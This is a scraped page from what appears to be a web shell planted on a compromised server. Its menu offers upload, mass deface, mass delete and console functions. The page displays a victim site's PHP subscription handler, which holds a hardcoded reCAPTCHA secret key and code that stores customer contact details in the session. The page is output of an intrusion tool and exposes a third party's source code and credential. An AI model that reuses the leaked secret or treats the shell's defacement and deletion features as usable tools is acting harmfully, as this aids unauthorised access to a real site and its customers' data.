shell bypass 403

Cubjrnet7 Shell

: /home/eklavya/www/chakmak/chakmak/Dump/ [ drwxr-xr-x ]
upload mass deface mass delete console info server

name : subscribe_process.php
<?php
session_start();
include "define.php";

if($_POST['f_name']!=' ' && $_POST['l_name'] != '' && $_POST['member']!=' ')
{
	$recaptcha_secret = "6LdoYSgTAAAAAAYHEkgUTj7elJNmz4Q_H81LRQBA";
        $response = file_get_contents("https://www.google.com/recaptcha/api/siteverify?secret=".$recaptcha_secret."&response=".$_POST['g-recaptcha-response']);
        $response = json_decode($response, true);
if($response["success"] != true)
        {
           
            header('Location:http://www.eklavya.in/chakmak/chakmak/sadasyata.php?Message'); 
            exit();
          
        }

       $fname= $_POST['f_name'];
	$lname = $_POST['l_name'];
	$subscription = $_POST['member'];
	$scheme = $_POST['scheme'];
	$source = $_POST['referral'];
	$address = $_POST['add'];
	$city = $_POST['city'];
	$zip= $_POST['pcode'];
	$state = $_POST['state'];
	$email = $_POST['email'];
	$std = $_POST['p_std_number'];
	$contact = $_POST['p_number'];
	$mobile = $_POST['mobile'];
	$instruction = $_POST['instruction'];
	
	if(strcmp($std,'STD Code:') == 0)
	{
		$std = '';
	}
	if(strcmp($contact,'Phone Number:') == 0)
	{
		$contact = '';
	}
	if(strcmp($mobile,'Mobile Number:') == 0)
	{
		$mobile = '';
	}
	
	$chakmak_issue = isset($_POST['chakmak_issue'])?$_POST['chakmak_issue']:0;
	
	if(isset($_POST['order_is_payment_online']))
		$order_is_payment_online = $_POST['order_is_payment_online'];
	if($order_is_payment_online[0] == 'Submit For Online Payment')
		$submitProcess = 1;
	else
		$submitProcess = 0;
	
global $subscrType;
global $subscrScheme;
global $subscrPay;
global $newURL;
$grtotal = 0;

$subscr = $subscrType[$subscription].' for '.$subscrScheme[$scheme];
$amount = $subscrPay[$subscription][$scheme];
$grtotal = $amount;
$order[0] = array($subscr, $amount, '0', $amount);

if($chakmak_issue == 1)
{
	global $chakmakIssue;
	
	$order[1] = array('Chakmak\'s 300th Issue', $chakmakIssue[$subscription],'0', $chakmakIssue[$subscription]);
	$grtotal += $chakmakIssue[$subscription];
}
/*
echo '<pre>';
print_r($order);
echo '</pre>';
echo '<br /> grtotal:'.$grtotal;
echo '<br />'.$std.' '.$contact;
die(); 
*/
$order = serialize($order);

$_SESSION['myorder'] = $order;
$_SESSION['CustName'] = $fname;
$_SESSION['CustLastName'] = $lname;
$_SESSION['CustAddr'] = $address;
$_SESSION['CustDist'] = $city;
$_SESSION['CustState'] = $state;
$_SESSION['CustPin'] = $zip;
$_SESSION['CustEmail'] = $email;
$_SESSION['CustSTD'] = $std;
$_SESSION['CustPhone'] = $contact;
$_SESSION['KnownSource'] = $source;
$_SESSION['grtotal'] = $grtotal;
$_SESSION['submitProcess'] = $submitProcess;
$_SESSION['CustMobile'] = $mobile;
$_SESSION['CustNote'] = $instruction;

header('Location:'.$newURL);
exit();
}
?>

© 2025 Cubjrnet7